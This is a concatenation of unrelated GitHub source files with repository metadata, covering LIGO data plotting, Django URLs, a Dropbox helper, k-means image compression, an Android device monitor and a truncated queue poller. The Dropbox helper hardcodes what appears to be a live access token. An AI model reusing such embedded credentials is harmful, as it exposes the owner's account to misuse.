Pxx_4, freqs_4 = mlab.psd(strain_4, Fs = fs, NFFT = NFFT)
fmin = 10
fmax = 8192
plt.figure()
plt.loglog(freqs_16, np.sqrt(Pxx_16),'b',label='strain at 16384')
plt.loglog(freqs_4, np.sqrt(Pxx_4), 'm',label='strain at 4096')
plt.axis([fmin, fmax, 1e-24, 1e-19])
plt.grid('on')
plt.ylabel('ASD (strain/rtHz)')
plt.xlabel('Freq (Hz)')
plt.legend(loc='upper center')
plt.title('Advanced LIGO strain data near GW150914')
plt.savefig('GW150914_H1_ASD_16384.png')
# Good agreement between 16384 Hz data and 4096 Hz data,
# up to around f_Nyquist = 2048 Hz. Let's zoom in for a closer look:
# In[18]:
# Zoom in on the 1000-2000 Hz region:
fmin = 1500
fmax = 2100
plt.figure()
plt.plot(freqs_16, np.sqrt(Pxx_16),'b',label='strain at 16384')
plt.plot(freqs_4, np.sqrt(Pxx_4), 'm',label='strain at 4096')
plt.axis([fmin, fmax, 1e-23, 5e-23])
plt.grid('on')
plt.ylabel('ASD (strain/rtHz)')
plt.xlabel('Freq (Hz)')
plt.legend(loc='upper center')
plt.title('Advanced LIGO strain data near GW150914')
plt.savefig('GW150914_H1_ASD_16384_zoom.png')
# The downsampled data deviate significantly from the original above ~1700 Hz. This is an undesirable, but inevitable result of downsampling (decimating). The plus side is that for frequencies less than 80% of Nyquist, the data are faithfully reproduced.
#
# If frequency content above that point is important to you, you need to use the 16384 Hz data.
#
# Else, you can save download time, disk space and memory by using the 4096 Hz data.
# In[19]:
# Now downsample the 16384 Hz data and compare with the 4096 Hz data
factor = 4
numtaps = 61
strain_4new = signal.decimate(strain_16, factor, numtaps-1,ftype='fir')
fs = 4096
NFFT = 1*fs
Pxx_4new, freqs_4 = mlab.psd(strain_4new, Fs = fs, NFFT = NFFT)
fmin = 1500
fmax = 2100
plt.figure()
plt.plot(freqs_4, np.sqrt(Pxx_4new),'b',label='strain at 4096 from decimate')
plt.plot(freqs_4, np.sqrt(Pxx_4), 'm--',label='strain at 4096 from file')
plt.axis([fmin, fmax, 1e-23, 5e-23])
plt.grid('on')
plt.ylabel('ASD (strain/rtHz)')
plt.xlabel('Freq (Hz)')
plt.legend(loc='upper left')
plt.title('Advanced LIGO strain data near GW150914')
plt.savefig('GW150914_H1_ASD_4096_zoom.png')
# The two traces are on top of each other, as expected. That's how we made the downsampled data in the first place.
# From the above, we learn exactly how LOSC downsamples the strain time series from 16384 Hz to 4096 Hz
# (ie, using scipy.decimate), and that if you are interested in frequency content above ~ 1700 Hz,
# use the 16384 Hz sample rate data instead.
# ## Data segments
#
# As mentioned above, LIGO strain time series data has gaps (filled with NaNs) when the detectors are not taking valid ("science quality") data. Analyzing these data requires the user to loop over "segments" of valid data stretches.
#
# For this GW150914 data release, the data have no gaps. Let's verify this, using the L1 data file containing 32 seconds of data sampled at 4096 Hz.
#
# You are welcome to repeat this with H1 data, with files containing 4096 seconds of data, and with data sampled at 16384 Hz. All of the relevant files are listed near the top of this tutorial.
# In[20]:
# read in the data at 4096 Hz:
fn = 'L-L1_LOSC_4_V1-1126259446-32.hdf5'
strain, time, chan_dict = rl.loaddata(fn, 'H1')
print "Contents of all the key, value pairs in chan_dict"
for keys,values in chan_dict.items():
print(keys)
print(values)
print "We see that all keys have 32 seconds of '1', meaning the data pass all data quality flags"
print "and have no HW injections, except there are CW injections in L1."
print " "
print 'Total number of non-NaNs in these data = ',np.sum(~np.isnan(strain))
print 'GPS start, GPS stop and length of all data in this file = ',time[0], time[-1],len(strain)
# select the level of data quality; default is "DATA" but "CBC_CAT3" is a conservative choice:
DQflag = 'CBC_CAT3'
# readligo.py method for computing segments (start and stop times with continuous valid data):
segment_list = rl.dq_channel_to_seglist(chan_dict[DQflag])
print 'Number of segments with DQflag',DQflag,' = ',len(segment_list)
# loop over seconds and print out start, stop and length:
iseg = 0
for segment in segment_list:
time_seg = time[segment]
seg_strain = strain[segment]
print 'GPS start, GPS stop and length of segment',iseg, 'in this file = ',time_seg[0], time_seg[-1], len(seg_strain)
iseg = iseg+1
# here is where you would insert code to analyze the data in this segment.
# now look at segments with no CBC hardware injections:
DQflag = 'NO_CBC_HW_INJ'
segment_list = rl.dq_channel_to_seglist(chan_dict['NO_CBC_HW_INJ'])
print 'Number of segments with DQflag',DQflag,' = ',len(segment_list)
iseg = 0
for segment in segment_list:
time_seg = time[segment]
seg_strain = strain[segment]
print 'GPS start, GPS stop and length of segment',iseg, 'in this file = ',time_seg[0], time_seg[-1], len(seg_strain)
iseg = iseg+1
|
[
"[email protected]"
] | |
75b8cf6fde95fbd9a46ab0c2c5277b706714856b
|
ce6538b5b7da162c1c690a346e7ec9ae0a6291f3
|
/wild_cat_zoo/project/cheetah.py
|
92f02831fe0904412100be1467c39f16c02a2ad7
|
[] |
no_license
|
DaniTodorowa/Softuni
|
391f13dd61a6d16cd48ee06e9b35b2fd931375df
|
f7c875fda4e13ec63152671509aaa6eca29d7f50
|
refs/heads/master
| 2022-11-25T23:34:49.744315 | 2020-08-02T08:23:44 | 2020-08-02T08:23:44 | 278,938,559 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 298 |
py
|
class Cheetah:
def __init__(self, name, gender, age):
self.name = name
self.gender = gender
self.age = age
@staticmethod
def get_needs(self):
return 60
def __repr__(self):
return f"Name: {self.name}, Age: {self.age}, Gender: {self.gender}"
|
[
"[email protected]"
] | |
c02054b0e7144f761e863a5a249d40a75b1c8cc5
|
6a609bc67d6a271c1bd26885ce90b3332995143c
|
/exercises/exhaustive-search/combinations_ii.py
|
46561751342eaead6317019aa18b093dfc811644
|
[] |
no_license
|
nahgnaw/data-structure
|
1c38b3f7e4953462c5c46310b53912a6e3bced9b
|
18ed31a3edf20a3e5a0b7a0b56acca5b98939693
|
refs/heads/master
| 2020-04-05T18:33:46.321909 | 2016-07-29T21:14:12 | 2016-07-29T21:14:12 | 44,650,911 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 668 |
py
|
# -*- coding: utf-8 -*-
"""
Given a list of integer lists. Each time take an item from each list. Find all the combinations.
"""
class Solution(object):
def combine(self, arr):
"""
:type arr: List[List[init]]
:rtype: List[List[int]]
"""
def dfs(res, pos):
if len(res) == len(arr):
results.append(res)
return
for i in xrange(len(arr[pos])):
dfs(res + [arr[pos][i]], pos + 1)
results = []
dfs([], 0)
return results
if __name__ == '__main__':
arr = [[1,2], [3,4], [5,6,7]]
sol = Solution()
print sol.combine(arr)
|
[
"[email protected]"
] | |
c359621f88fe116601d909b5dce736eebf473a4f
|
132c7b0c8ba606a249fbdfe24f9d73e7e224d260
|
/sanyuapp/urls.py
|
718ddf53afbfca5bc73c30fb4040c7281a875e3f
|
[] |
no_license
|
sanyuOnline/sanyu-webapp
|
dafa3505d7f3d6eca225ca6b4dce3fa683d5e9fe
|
c8e3824146bb9eb4dcf971a1cdef2bc4475385f1
|
refs/heads/main
| 2023-08-31T12:52:06.104078 | 2021-10-27T07:03:09 | 2021-10-27T07:03:09 | 406,589,964 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,073 |
py
|
"""sanyuapp URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('users/', include('users.urls')),
path('users/', include('django.contrib.auth.urls')),
path('', include('pages.urls')),
path('', include('blog.urls')),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
[
"[email protected]"
] | |
f1fc5e04b67e273abf07193662fafc8712fb4c60
|
07c262960dde4da25e48030d1d4727e2e4392e45
|
/hw1/data/prepcocess.py
|
ef43c8e69176db0b4d21c0c6aa853863cda6f2e0
|
[] |
no_license
|
a127000555/ML2018SPRING
|
2aae1fdaf92ff439e459a062a04d7b73fc3fb502
|
44d7ddf1abfae0c130cb0d57bd6bafbd14764eba
|
refs/heads/master
| 2021-03-30T21:03:22.259450 | 2018-07-05T16:01:25 | 2018-07-05T16:01:25 | 124,531,741 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,342 |
py
|
import csv
import numpy as np
cin = csv.reader(open('train.csv','r',encoding='big5'))
table = [row for row in cin]
#print(np.array(table))
stamp = 0
banned = ['2014/3/12','2014/4/2' , '2014/4/6']
all_training = []
for row_idx_head in range(1,len(table),18):
if table[row_idx_head][0] in banned:
continue
day = { 'id' : table[row_idx_head][0] }
for row_idx in range(row_idx_head,row_idx_head+18):
row = table[row_idx]
day.update({ row[2] : row[3:]})
# RAINFALL concert
rain = day['RAINFALL']
for idx in range(len(rain)):
if rain[idx] == 'NR' or float(rain[idx]) < 3:
rain[idx] = '0.0'
else:
rain[idx] = '1'
day.update( {'RAINFALL' : rain})
# PM2.5 error correct
pm = list(map(float,day['PM2.5']))
try:
for idx in range(len(pm)):
if pm[idx] < 1 or pm[idx] > 110:
raise Error()
if 0 < idx and idx < len(pm)-1:
if abs (pm[idx-1] - pm[idx+1] ) < 20 and abs (pm[idx] - pm[idx+1]) > 18:
pass
#print((pm[idx-1],pm[idx],pm[idx+1]),pm , sep='\n')
#raise Error()
except:
continue
day.update( {'PM2.5' : pm})
# PM10 error correct
pm = list(map(float,day['PM10']))
try:
for item in pm:
if item == 0 or item >200:
#print(pm)
raise Error()
except:
continue
day.update( {'PM10' : pm})
# CO error correct
co = list(map(float,day['CO']))
try:
pass
#print(np.array(co))
# for item in co:
# if item == 0 or item >200:
# print(pm)
# raise Error()
except:
continue
day.update( {'CO' : co})
wd = list(map(float,day['WIND_DIREC']))
try:
day.update( {'WD_COS' : np.cos(np.array(wd) * np.pi / 180)})
day.update( {'WD_SIN' : np.sin(np.array(wd) * np.pi / 180)})
print(np.cos(np.array(wd) *np.pi / 180))
print(np.sin(np.array(wd) *np.pi / 180))
# for item in co:
# if item == 0 or item >200:
# print(pm)
# raise Error()
except Exception as e:
print(e)
exit(0)
continue
all_training.append(day)
#exit(0)
#print(all_training)
import pickle
with open('date_process/train.pickle','wb') as fout:
pickle.dump(all_training,fout)
cin = csv.reader(open('test.csv','r',encoding='big5'))
table = [row for row in cin]
#print(np.array(table) , len(table),18)
all_training = []
for row_idx_head in range(0,len(table),18):
if table[row_idx_head][0] in banned:
continue
day = { 'id' : table[row_idx_head][0] }
for row_idx in range(row_idx_head,row_idx_head+18):
row = table[row_idx]
day.update({ row[1] : row[2:]})
# RAINFALL correct
rain = day['RAINFALL']
for idx in range(len(rain)):
if rain[idx] == 'NR':
rain[idx] = '0.0'
day.update( {'RAINFALL' : rain})
# PM2.5 error correct
pm = list(map(float,day['PM2.5']))
try:
for idx in range(len(pm)):
if pm[idx] <= 0 :
if 0 < idx and idx < len(pm)-1 and 5 < pm[idx+1] and pm[idx+1]< 100:
pm[idx] = (pm[idx-1] + pm[idx+1])/2
else:
# edge processing
if idx == 0:
pm[idx] = ( pm[idx+1] + pm[idx+2] )/2
if idx == len(pm)-1:
pm[idx] = pm[idx-1]
except:
continue
try:
for idx in range(len(pm)):
if 0 < idx and idx < len(pm)-1:
if abs (pm[idx-1] - pm[idx+1] ) < 20 and abs (pm[idx] - pm[idx+1]) > 20:
pm[idx] = ( pm[idx-1] + pm[idx+1] )/2
#print((pm[idx-1],pm[idx],pm[idx+1]),pm , sep='\n')
except:
continue
day.update( {'PM2.5' : pm})
#print(day['PM2.5'])
# PM10 error correct
pm = list(map(float,day['PM10']))
try:
for idx in range(len(pm)):
if pm[idx] <= 0 :
if 0 < idx and idx < len(pm)-1 and 5 < pm[idx+1] and pm[idx+1]< 100:
#print('=>' , pm)
pm[idx] = (pm[idx-1] + pm[idx+1])/2
#print('<=' , pm)
else:
# edge processing
if idx == 0:
pm[idx] = ( pm[idx+1] + pm[idx+2] )/2
if idx == len(pm)-1:
pm[idx] = pm[idx-1]
except:
continue
day.update( {'PM10' : pm})
all_training.append(day)
#print(all_training)
with open('date_process/test.pickle','wb') as fout:
pickle.dump(all_training,fout)
'''
PM 2.5 cleaning:
2014/3/12 [65.0, 61.0, 66.0, 66.0, 69.0, 131.0, 919.0, 919.0, 919.0, 0.0, 0.0, 908.0, 914.0, 914.0, 914.0, 70.0, 72.0, 82.0, 86.0, 97.0, 98.0, 98.0, 87.0, 76.0]
919.0 can't tell.
2014/4/2 [21.0, 22.0, 26.0, 15.0, 12.0, 3.0, 10.0, 13.0, 19.0, 16.0, 0.0, 631.0, 5.0, 0.0, 12.0, 15.0, 7.0, 10.0, 18.0, 29.0, 34.0, 37.0, 50.0, 51.0]
631.0 can't tell.
2014/4/6 NMHC / THC chaos.
'''
|
[
"[email protected]"
] | |
314255e054c0ccca2a072d2515304f2f4f772b2d
|
2896efe044a9b5d7caa545f39eb8bc12e514f275
|
/lab02a.py
|
2d8d43abff4d51d2515919aaed1bf3c824c38378
|
[] |
no_license
|
riamokashi/Computer-Science-Labs
|
8d4acf23f3b7d0f4b5b9cb7475caaeef136fe047
|
15b662f46a37dbe20031ef6ecb0e063fce3d7df4
|
refs/heads/master
| 2020-08-16T04:30:31.001123 | 2019-10-16T04:11:43 | 2019-10-16T04:11:43 | 215,454,752 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 767 |
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 9 16:36:12 2019
@author: riamokashi
"""
odd_sum = 0
even_sum = 0
odd_count = 0
even_count = 0
positive_int_count = 0
while True:
n_str = input("Input an integer (0 terminates): ")
n_int = int(n_str)
if n_int == 0:
break
elif n_int < 0:
continue
elif n_int % 2 == 1:
odd_sum += n_int
odd_count += 1
elif n_int % 2 == 0:
even_sum += n_int
even_count += 1
positive_int_count += 1
# Good stuff goes here
print()
print("sum of odds:", odd_sum)
print("sum of evens:", even_sum)
print("odd count:", odd_count)
print("even count:", even_count)
print("total positive int count:", positive_int_count)
|
[
"[email protected]"
] | |
57d831e8dd13648f57838ae881015f3fc20c13d1
|
ebb6deb23eba704efeecd300ad42770f73007470
|
/ind1_1.py
|
bbe0af5bfe6ca114ffb098abf03806b124b1f7b1
|
[
"MIT"
] |
permissive
|
IshchenkoMaksim/lab6
|
a1d275c0008c5d446e670ec6092f37e56ea8c1c1
|
92c1b298e0c97c22fbd43fe81ddc510ef994cbc3
|
refs/heads/main
| 2023-05-02T15:53:13.136710 | 2021-05-12T13:14:13 | 2021-05-12T13:14:13 | 365,343,695 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 652 |
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# №1 В-1 Ввести список А из 10 элементов, найти наибольший элемент и переставить его с первым элементом.
# Преобразованный массив вывести.
import sys
if __name__ == '__main__':
A = list(map(int, input().split()))
n = 0
if len(A) != 10:
print("Неверный размер списка", file=sys.stderr)
exit(1)
n = max(a for i, a in enumerate(A))
n = A.index(n)
if n == 0:
print(A)
else:
A[0], A[n] = A[n], A[0]
print(A)
|
[
"[email protected]"
] | |
e9b4572ab1f8e1c87a7d0030bcf82691a6a035e5
|
880103c6f9bdc9d5a7a8633c3e4d108c964e9b89
|
/devil/devil/android/tools/device_monitor.py
|
2b3503174c8a364463e242fa2f450a76e5b3047f
|
[
"BSD-3-Clause"
] |
permissive
|
ateleshev/catapult
|
c3645f0fb0d4e929b5baebea33307b765225cb2f
|
faf60eb37f8b9828eddb30c8397b333eb1d89204
|
refs/heads/master
| 2021-01-22T19:08:47.140355 | 2017-03-16T01:01:54 | 2017-03-16T01:01:54 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,936 |
py
|
#!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Launches a daemon to monitor android device temperatures & status.
This script will repeatedly poll the given devices for their temperatures and
status every 60 seconds and dump the stats to file on the host.
"""
import argparse
import collections
import json
import logging
import logging.handlers
import os
import re
import socket
import sys
import time
if __name__ == '__main__':
sys.path.append(
os.path.abspath(os.path.join(os.path.dirname(__file__),
'..', '..', '..')))
from devil import devil_env
from devil.android import battery_utils
from devil.android import device_blacklist
from devil.android import device_errors
from devil.android import device_utils
# Various names of sensors used to measure cpu temp
CPU_TEMP_SENSORS = [
# most nexus devices
'tsens_tz_sensor0',
# android one
'mtktscpu',
# nexus 9
'CPU-therm',
]
DEVICE_FILE_VERSION = 1
# TODO(bpastene): Remove the old file once sysmon has been updated to read the
# new status file.
DEVICE_FILES = [
os.path.join(os.path.expanduser('~'), 'android_device_status.json'),
os.path.join(
os.path.expanduser('~'), '.android',
'%s__android_device_status.json' % socket.gethostname().split('.')[0]
),
]
MEM_INFO_REGEX = re.compile(r'.*?\:\s*(\d+)\s*kB') # ex: 'MemTotal: 185735 kB'
def get_device_status(device):
"""Polls the given device for various info.
Returns: A dict of the following format:
{
'battery': {
'level': 100,
'temperature': 123
},
'build': {
'build.id': 'ABC12D',
'product.device': 'chickenofthesea'
},
'mem': {
'avail': 1000000,
'total': 1234567,
},
'processes': 123,
'state': 'good',
'temp': {
'some_sensor': 30
},
'uptime': 1234.56,
}
"""
status = collections.defaultdict(dict)
# Battery
battery = battery_utils.BatteryUtils(device)
battery_info = battery.GetBatteryInfo()
try:
level = int(battery_info.get('level'))
except (KeyError, TypeError, ValueError):
level = None
if level and level >= 0 and level <= 100:
status['battery']['level'] = level
try:
temperature = int(battery_info.get('temperature'))
except (KeyError, TypeError, ValueError):
temperature = None
if temperature:
status['battery']['temperature'] = temperature
# Build
status['build']['build.id'] = device.build_id
status['build']['product.device'] = device.build_product
# Memory
mem_info = ''
try:
mem_info = device.ReadFile('/proc/meminfo')
except device_errors.AdbShellCommandFailedError:
logging.exception('Unable to read /proc/meminfo')
for line in mem_info.splitlines():
match = MEM_INFO_REGEX.match(line)
if match:
try:
value = int(match.group(1))
except ValueError:
continue
key = line.split(':')[0].strip()
if 'MemTotal' == key:
status['mem']['total'] = value
elif 'MemFree' == key:
status['mem']['free'] = value
# Process
try:
lines = device.RunShellCommand('ps', check_return=True)
status['processes'] = len(lines) - 1 # Ignore the header row.
except device_errors.AdbShellCommandFailedError:
logging.exception('Unable to count process list.')
# CPU Temps
# Find a thermal sensor that matches one in CPU_TEMP_SENSORS and read its
# temperature.
files = []
try:
files = device.RunShellCommand(
'grep -lE "%s" /sys/class/thermal/thermal_zone*/type' % '|'.join(
CPU_TEMP_SENSORS), check_return=True)
except device_errors.AdbShellCommandFailedError:
logging.exception('Unable to list thermal sensors.')
for f in files:
try:
sensor_name = device.ReadFile(f).strip()
temp = float(device.ReadFile(f[:-4] + 'temp').strip()) # s/type^/temp
status['temp'][sensor_name] = temp
except (device_errors.AdbShellCommandFailedError, ValueError):
logging.exception('Unable to read thermal sensor %s', f)
# Uptime
try:
uptimes = device.ReadFile('/proc/uptime').split()
status['uptime'] = float(uptimes[0]) # Take the first field (actual uptime)
except (device_errors.AdbShellCommandFailedError, ValueError):
logging.exception('Unable to read /proc/uptime')
status['state'] = 'available'
return status
def get_all_status(blacklist):
status_dict = {
'version': DEVICE_FILE_VERSION,
'devices': {},
}
healthy_devices = device_utils.DeviceUtils.HealthyDevices(blacklist)
parallel_devices = device_utils.DeviceUtils.parallel(healthy_devices)
results = parallel_devices.pMap(get_device_status).pGet(None)
status_dict['devices'] = {
device.serial: result for device, result in zip(healthy_devices, results)
}
if blacklist:
for device, reason in blacklist.Read().iteritems():
status_dict['devices'][device] = {
'state': reason.get('reason', 'blacklisted')}
status_dict['timestamp'] = time.time()
return status_dict
def main(argv):
"""Launches the device monitor.
Polls the devices for their battery and cpu temperatures and scans the
blacklist file every 60 seconds and dumps the data to DEVICE_FILE.
"""
parser = argparse.ArgumentParser(
description='Launches the device monitor.')
parser.add_argument('--adb-path', help='Path to adb binary.')
parser.add_argument('--blacklist-file', help='Path to device blacklist file.')
args = parser.parse_args(argv)
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
handler = logging.handlers.RotatingFileHandler(
'/tmp/device_monitor.log', maxBytes=10 * 1024 * 1024, backupCount=5)
fmt = logging.Formatter('%(asctime)s %(levelname)s %(message)s',
datefmt='%y%m%d %H:%M:%S')
handler.setFormatter(fmt)
logger.addHandler(handler)
devil_dynamic_config = devil_env.EmptyConfig()
if args.adb_path:
devil_dynamic_config['dependencies'].update(
devil_env.LocalConfigItem(
'adb', devil_env.GetPlatform(), args.adb_path))
devil_env.config.Initialize(configs=[devil_dynamic_config])
blacklist = (device_blacklist.Blacklist(args.blacklist_file)
if args.blacklist_file else None)
logging.info('Device monitor running with pid %d, adb: %s, blacklist: %s',
os.getpid(), args.adb_path, args.blacklist_file)
while True:
start = time.time()
status_dict = get_all_status(blacklist)
for device_file in DEVICE_FILES:
with open(device_file, 'wb') as f:
json.dump(status_dict, f, indent=2, sort_keys=True)
logging.info('Got status of all devices in %.2fs.', time.time() - start)
time.sleep(60)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
[
"[email protected]"
] | |
ca128136c7a63d4f70b2d6bc02bb47eeb3885205
|
6d2df64e318983640a3f26e6ef95ffd00a166e54
|
/Development/Tests/Vin_Voltage.py
|
684a12a6b3a9af7e45b444f9d3190699d08cd538
|
[] |
no_license
|
sgbbhat/SolderStationAuto
|
2c9145f87b1e404d0e319fcdfe9612f2f095b30a
|
8ed10cd8228253b7679533cc5d4f71c93b2803a7
|
refs/heads/master
| 2020-06-13T17:34:21.552052 | 2019-10-30T19:42:26 | 2019-10-30T19:42:26 | 194,733,660 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,150 |
py
|
# Function to measure battery voltage and display test
from tkinter import END
from os import *
import time
import re
from Tests.displayResult import displayResult
from tkinter import *
from tkinter import messagebox
def Vin_Voltage(root, key, val, databaseHandle, mfgID, Sln, TestNameText, MinLimitText, MaxLimitText, MeasurementText, ResultText, modelFileContent, testStartTime, OperationMode, OperationModeInput, LotNumvberInput):
rawScale = popen('megaioind 0 ruin 3').read()
measurement = float(rawScale)
if measurement < float(val[1]) or measurement > float(val[2]) :
messagebox.showerror("Error", "Check if the bridge is Soldered \n \nSolder the bridge and press OK")
rawScale = popen('megaioind 0 ruin 3').read()
measurement = float(rawScale)
result = 'Pass' if measurement > float(val[1]) and measurement < float(val[2]) else 'Fail'
mod_TestName = re.sub(r"(\w)([A-Z])", r"\1 \2", key)
# Display Test and results
displayResult(TestNameText, MinLimitText, MaxLimitText, MeasurementText, ResultText, mod_TestName, val, measurement, result)
# Return test results
if result == "Fail":
return False
else:
return True
|
[
"[email protected]"
] | |
cc6c7bd30039caf0625491719ee498eb3ca75398
|
d0a5f10d54bc336fba4c341c59297d8a75886c24
|
/dropbox_helper.py
|
8650f2f4a74b8c98decb7bac38f698325a8bf227
|
[] |
no_license
|
azabujuban/sleeping_pattern
|
89ca22d4a371de412bd96657157556c943786a49
|
ed3538804cdfe1c18f6f198e417a064c75c1bef1
|
refs/heads/master
| 2021-01-01T19:46:39.357136 | 2014-12-08T15:22:36 | 2014-12-08T15:22:36 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,500 |
py
|
__author__ = 'maxlevy'
from dropbox import client
import os
class DropboxHelper():
def __init__(self):
self.api_client = None
try:
access_token = 'qsEe-HKsKCEAAAAAAAAGVx_DNOVFQCrjtcsAEFNeTeenQ1NwKsis-51HZDpYjwG2'
self.api_client = client.DropboxClient(access_token)
except IOError:
pass # don't worry if it's not there
def mirror_tlog_files(self, remote_folder, local_folder):
"""
Copy file from Dropbox to local file and print out the metadata.
Examples:
Dropbox> get file.txt ~/dropbox-file.txt
"""
local_folder = os.path.expanduser(local_folder) + '/' + remote_folder.split('/')[-1:][0]
if not os.path.exists(local_folder):
os.makedirs(local_folder)
md = self.api_client.metadata(remote_folder)
tlog_folders = [_['path'] for _ in md['contents'] if _['is_dir'] and not 'Media' in _['path']]
for tlog_folder in tlog_folders:
print('Checking in', tlog_folder)
# step into that folder, adjust the local folder too
self.mirror_tlog_files(tlog_folder, local_folder + "/" + tlog_folder.split("/")[-1:][0])
tlog_paths = [_['path'] for _ in md['contents'] if 'TransactionLog' in _['path'][-len('TransactionLog0.tlog'):]]
for tlog_path in tlog_paths:
# if the size differs - copy it
remote_size = self.api_client.metadata(tlog_path)['bytes']
tlog_local_path = local_folder + '/' + tlog_path.split('/')[-1:][0]
local_size = os.path.getsize(tlog_local_path) if os.path.exists(tlog_local_path) else 0
if remote_size == local_size:
#print('Skipping copy for ', tlog_path.split('/')[-1:][0], '- the local copy has the same size: ', tlog_local_path)
continue
to_file = open(tlog_local_path, "wb")
f, metadata = self.api_client.get_file_and_metadata(tlog_path)
print('Copying ', tlog_path.split('/')[-1:][0], ' into ', tlog_local_path)
to_file.write(f.read())
def do_ls(self, path):
"""list files in current remote directory"""
resp = self.api_client.metadata(path)
images = []
if 'contents' in resp:
for f in resp['contents']:
name = os.path.basename(f['path'])
#encoding = locale.getdefaultlocale()[1] or 'ascii'
#self.stdout.write(('%s\n' % name).encode(encoding))
images.append(name)
return images
def get_shared_url(self, file_pathname):
url_short = self.do_share(file_pathname)
# will get you something like https://db.tt/0By6ntxQ
# now need to navigate there and take the real URL, someting like
# https://www.dropbox.com/s/7m2nt9baimhejac/430D98CA-2F75-45EF-ACA1-9837992E8F8B.jpg?dl=0
import urllib
page = urllib.request.urlopen(url_short)
url = page.geturl()
# now just get rid of the ?dl=0 parameter
from urllib.parse import urlparse
o = urlparse(url)
imgUrl = o.scheme + '://' + o.netloc + o.path
return imgUrl
def do_share(self, path):
"""Create a link to share the file at the given path."""
return self.api_client.share(path)['url']
|
[
"[email protected]"
] | |
b8811aa2495584808df47112d19fab3fa7a3e441
|
952793f6d2444b1d8221cf584a5c629c54806f95
|
/kmeans.py
|
a6e4db68c23b70d2e34b0bed4a3426be000a2eac
|
[] |
no_license
|
scopegeneral/MiniProjects
|
24f57225e075e33ae05af036864e3ad21cbfe673
|
554cda16f03f1d94bb7380df4446146cde862aab
|
refs/heads/master
| 2020-03-23T09:49:59.835655 | 2018-07-21T05:02:45 | 2018-07-21T05:02:45 | 141,410,083 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,404 |
py
|
import numpy as np
import imageio
import matplotlib.pyplot as plt
def initKMeans(X, K):
[m, n] = X.shape
rand_idx = np.random.permutation(m)
rand_idx = rand_idx[:K]
centroids = X[rand_idx,:]
return centroids
def findClosestCentroids(X, initial_centroids):
[K, n] = initial_centroids.shape
[m, n] = X.shape
distances = np.zeros((m,K))
for i in range(K):
centroid_i = np.array([initial_centroids[i,:],]*m)
distances_i = (X - centroid_i)**2
distances[:,i] = distances_i.sum(axis = 1)
idx = np.argmin(distances,axis = 1)
return idx
def computeCentroids(X, idx, K):
[m, n] = X.shape
centroids = np.zeros((K,n))
for i in range(K):
group_i = X[idx == i,:]
centroids[i,:] = group_i.sum(axis = 0)/group_i.shape[0]
return centroids
if __name__ == "__main__":
A = imageio.imread(r"C:\Users\320004436\OneDrive - Philips\Desktop\Cp\test3.jpg")
A = A / 255
image_size = A.shape
A = np.reshape(A, (image_size[0]*image_size[1],3))
K = 16
max_iter = 10
centroids = initKMeans(A, K)
for i in range(max_iter):
print("K-Means Iteration {}/{}".format(i+1,max_iter))
idx = findClosestCentroids(A, centroids)
centroids = computeCentroids(A, idx, K)
A_compressed = centroids[idx,:]
A_compressed = np.reshape(A_compressed,(image_size[0],image_size[1],3))
plt.figure()
plt.imshow(A_compressed)
plt.show()
|
[
"[email protected]"
] | |
581d5e4892904165e00c1562bbdcc03dfe1ec4fc
|
ae1a91ba30fc82f1db484beca76fbb95ab835b2f
|
/apps/channel/management/commands/_archive/poll_queue.py
|
6beabbdeb682eddbb3f9ee8556cd7965a314c570
|
[] |
no_license
|
IntelligentTrading/clover
|
fa6728819e10c0357a5a3d5345581f6647bb1e68
|
84fa62eab4fd05ca6ee9fd966fc9981d5073ffd1
|
refs/heads/master
| 2022-10-15T23:20:11.849176 | 2019-07-17T14:09:54 | 2019-07-17T14:09:54 | 160,502,598 | 0 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,135 |
py
|
import json
import logging
import datetime
from django.core.management.base import BaseCommand
from django.db import IntegrityError
from apps.channel.incoming_queue import SqsListener
from apps.indicator.models import Price, Volume, PriceHistory
from taskapp.helpers.common import get_source_name
from settings import INCOMING_SQS_QUEUE, COUNTER_CURRENCY_CHOICES, BINANCE
logger = logging.getLogger(__name__)
class Command(BaseCommand):
help = "Polls price data from the incoming queue"
def handle(self, *args, **options):
logger.info("Getting ready to poll prices from the queue")
listener = SqsListener(INCOMING_SQS_QUEUE, wait_time=10)
listener.handler = process_message_from_queue
listener.listen()
# * Standart Format
# symbols_info = [
# { 'source': 'poloniex',
# 'category': 'price', # or 'volume'
# 'symbol': 'BTC/USDT' # LTC/BTC
# 'value': 12345678,
# 'timestamp': 1522066118.23
# }, ...
# ]
def process_message_from_queue(message_body):
"Save SQS message to DB: Price, Volume and PriceHistory"
body_dict = json.loads(message_body)
subject = body_dict['Subject']
items = json.loads(body_dict['Message'])
#processed = []
for item in items:
# logger.debug(f"Save {item['category']} for {item['symbol']} from {item['source']}")
# source_code = next((code for code, source_text in SOURCE_CHOICES if source_text == item['source']), None)
source_code = BINANCE
(transaction_currency, counter_curency_text) = item['symbol'].split('/')
